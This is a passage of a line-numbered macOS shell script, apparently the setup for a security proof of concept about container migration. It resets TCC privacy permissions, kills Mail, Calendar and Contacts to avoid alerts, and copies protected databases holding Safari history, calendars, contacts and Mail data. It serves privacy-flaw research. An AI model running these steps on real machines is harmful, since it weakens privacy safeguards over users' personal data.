TCC permissions: 11 | tccutil reset All com.pvieito.ContainerMigrationExpectedApp 12 | tccutil reset All com.pvieito.ContainerMigrationExploitApp 13 | 14 | # Create secret in Documents folder: 15 | uuidgen > ~/Documents/.my-secret.txt 16 | 17 | # To avoid alerts when the files are removed: 18 | killall Mail Calendar Contacts contactsd 19 | 20 | # Backup & restore sensitive files: 21 | cp ~/Library/Safari/History.db ~/Library/Safari/History.db.bak 22 | cp ~/Library/Safari/History.db.bak ~/Library/Safari/History.db 23 | cp ~/Library/Calendars/Calendar.sqlitedb ~/Library/Calendars/Calendar.sqlitedb.bak 24 | cp ~/Library/Calendars/Calendar.sqlitedb.bak ~/Library/Calendars/Calendar.sqlitedb 25 | cp ~/Library/Application\ Support/AddressBook/AddressBook-v22.abcddb ~/Library/Application\ Support/AddressBook/AddressBook-v22.abcddb.bak 26 | cp ~/Library/Application\ Support/AddressBook/AddressBook-v22.abcddb.bak ~/Library/Application\ Support/AddressBook/AddressBook-v22.abcddb 27 | cp ~/Library/Application\ Support/MailRecents-v4.abcdmr ~/Library/Application\ Support/AddressBook/MailRecents-v4.abcdmr.bak 28 | cp ~/Library/Application\ Support/AddressBook/MailRecents-v4.abcdmr.bak ~/Library/Application\ Support/AddressBook/MailRecents-v4.abcdmr 29 | cp ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/recentSearches.plist ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/recentSearches.plist.bak 30 | cp ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/recentSearches.plist.bak ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/recentSearches.plist 31 | cp ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/Envelope\ Index ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/Envelope\ Index.bak 32 | cp ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/Envelope\ Index.bak ~/Library/Containers/com.apple.mail/Data/Library/Mail/V10/MailData/Envelope\ Index 33 | --------------------------------------------------------------------------------